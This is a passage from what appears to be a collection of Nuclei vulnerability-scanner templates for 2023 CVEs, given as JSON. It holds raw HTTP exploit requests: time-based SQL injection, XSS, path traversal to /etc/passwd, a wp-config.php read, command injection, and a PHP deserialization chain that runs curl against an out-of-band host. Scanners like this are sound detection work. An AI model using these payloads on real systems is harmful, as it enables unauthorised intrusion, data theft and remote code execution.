HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-0676","info":{"name":"phpIPAM 1.5.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{BaseURL}}/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator\n\nwsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Login successful\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(content_type_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero  - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-41597","info":{"name":"EyouCms v1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["eyoucms","ey_fleshVerify"],"condition":"or","internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-40752","info":{"name":"PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><svg/onload=alert(window.origin)> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\"><script>alert(document.cookie)</script>","><script>alert(document.cookie)</script>bvu51"],"condition":"or"},{"type":"word","part":"body","words":["<table class=\"products-nav\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3188","info":{"name":"Owncast - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/remotefollow HTTP/1.1\nHost: {{Hostname}}\n\n{\"account\":\"a@{{interactsh-url}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["success\":","message\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5558","info":{"name":"LearnPress < 4.2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["/wp-content/plugins/learnpress"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["?param=value%22%27%3Balert(document.domain)%3C!--","?param=value%22%27%3Balert(document.domain)%3Bb=%27","?%27-alert(%60XSS%60)-%27=a","instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"';alert(document.domain)<!--","\"';alert(document.domain);b='","'-alert(`XSS`)-'=a","</script><script>alert`document.domain`</script>"],"condition":"or"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36347","info":{"name":"POS Codekop v2.0 - Broken Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/excel.php","{{BaseURL}}/pos-kasir-php/excel.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Document"]},{"type":"word","part":"header","words":["application/vnd.ms-excel"]}]}]},{"id":"CVE-2023-43373","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"hoteldruid\")"],"internal":true}]},{"raw":["POST /interconnessioni.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"anno\"\n\n2023\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"id_sessione\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"modifica_interconnessione\"\n\nSI\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"modifica_utente_agg\"\n\nSI\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"n_utente_agg\"\n\n1' AND (SELECT 3869 FROM (SELECT(SLEEP(7)))qSXB)-- QMbZ\n------------YWJkMTQzNDcw--\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36284","info":{"name":"QloApps 1.6.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["QloApps"],"case-insensitive":true}]},{"raw":["@timeout: 20s\nGET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"<span>Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: {{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '<pre>{{randstr}}</pre>') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<wps:Execute version=\"1.0.0\" service=\"WPS\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n  xmlns=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:wfs=\"http://www.opengis.net/wfs\"\n  xmlns:wps=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n  xmlns:gml=\"http://www.opengis.net/gml\"\n  xmlns:ogc=\"http://www.opengis.net/ogc\"\n  xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\"\n  xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n        xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n  <ows:Identifier>JTS:area</ows:Identifier>\n  <wps:DataInputs>\n    <wps:Input>\n      <ows:Identifier>geom</ows:Identifier>\n      <wps:Reference mimeType=\"application/json\" xlink:href=\"https://{{oast}}\" method=\"GET\">\n        <wps:Header key=\"{{string}}\" value=\"{{value}}\"/>\n      </wps:Reference>\n    </wps:Input>\n  </wps:DataInputs>\n  <wps:ResponseForm>\n    <wps:RawDataOutput>\n      <ows:Identifier>result</ows:Identifier>\n    </wps:RawDataOutput>\n  </wps:ResponseForm>\n</wps:Execute>\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: 